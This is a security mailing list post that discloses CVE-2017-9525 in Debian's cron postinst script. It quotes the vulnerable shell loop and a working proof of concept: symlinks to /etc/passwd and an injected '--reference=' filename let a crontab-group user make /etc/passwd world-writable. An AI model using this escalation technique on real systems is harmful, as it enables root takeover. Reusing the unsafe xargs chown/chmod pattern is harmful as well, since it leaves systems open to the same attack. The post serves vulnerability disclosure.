Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 9 Jun 2017 20:31:24 +0200
From: Salvatore Bonaccorso <carnil@...ian.org>
To: oss-security@...ts.openwall.com
Subject: Re: Vixie/ISC Cron group crontab to root escalation

Hi

On Thu, Jun 08, 2017 at 08:05:34PM +0200, Solar Designer wrote:
> In 2003, the original patch went from Owl into Debian (and thus Ubuntu),
> along with the original comment above:
> 
> https://anonscm.debian.org/cgit/pkg-cron/pkg-cron.git/commit/?id=ce8f4773590dd76505631bd71874e999a85de607
> 
> Thanks to Salvatore Bonaccorso of Debian for locating the above URL for
> the current discussion.  In there, we also see the addition of a
> postinst script changing permissions on existing crontab files.  This
> was also pointed out by Seth Arnold of Ubuntu, who wrote:
> 
> | - postinst scripts are already brittle
> | - postinst scripts themselves become a target for elevating privileges if
> |   they'll just set the permissions as needed
> | 
> | But the Debian/Ubuntu packaging already has scripts for this purpose:
> | 
> | http://sources.debian.net/src/cron/3.0pl1-128/debian/postinst/#L53
> | 
> | ...
> | # Fixup crontab , directory and files for new group 'crontab'.
> | # Can't use dpkg-statoverride for this because it doesn't cooperate nicely
> | # with cron alternatives such as bcron
> | if [ -d $crondir/crontabs ] ; then
> |     chown root:crontab $crondir/crontabs
> |     chmod 1730 $crondir/crontabs
> |     # This used to be done conditionally. For versions prior to "3.0pl1-81"
> |     # It has been disabled to suit cron alternative such as bcron.
> |     cd $crondir/crontabs
> |     set +e
> |     ls -1 | xargs -r -n 1 --replace=xxx  chown 'xxx:crontab' 'xxx'
> |     ls -1 | xargs -r -n 1 chmod 600
> |     set -e
> | fi
> 
> Qualys promptly broke this script, replying to Seth:
> 
> | Hmmm, you're right, the script itself is vulnerable to
> | group-crontab-to-root escalation of privileges:
> | 
> | root@...ian:~# usermod --append --groups crontab nobody
> | root@...ian:~# su --login --shell /bin/bash nobody
> | No directory, logging in with HOME=/
> | 
> | nobody@...ian:/$ id
> | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),107(crontab)
> | 
> | nobody@...ian:/$ cd /var/spool/cron/crontabs
> | 
> | # for example, this exploits the chown
> | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd- nobody
> | 
> | # for example, this exploits the chmod
> | nobody@...ian:/var/spool/cron/crontabs$ touch ./--reference=.RFILE
> | nobody@...ian:/var/spool/cron/crontabs$ chmod 0666 .RFILE > .RFILE
> | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd 600
> | 
> | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd*
> | -rw-r--r-- 1 root root 1378 May 10 17:16 /etc/passwd
> | -rw------- 1 root root 1378 May 10 17:16 /etc/passwd-
> | 
> | # run the postinst script
> | root@...ian:~# dpkg-reconfigure cron
> | chown: missing operand
> | Try 'chown --help' for more information.
> | update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
> | 
> | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd*
> | -rw-rw-rw- 1    600 crontab 1378 May 10 17:16 /etc/passwd
> | -rw------- 1 nobody crontab 1378 May 10 17:16 /etc/passwd-
> | 
> | So this is a known issue?  (there may be more ways to exploit it --
> | spaces, newlines, option injections, etc).
> 
> So this looked like two issues to fix: the temporary file hard link
> attack (in OpenBSD, Debian, Ubuntu, ALT Linux, and Owl) and the postinst
> script (in Debian and Ubuntu).

For the record, the Debian and Ubuntu specific issue with the postinst
script has been assigned CVE-2017-9525.

For further discussion with the Debian cron maintainers I have as well
opened https://bugs.debian.org/864466

Regards,
Salvatore

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ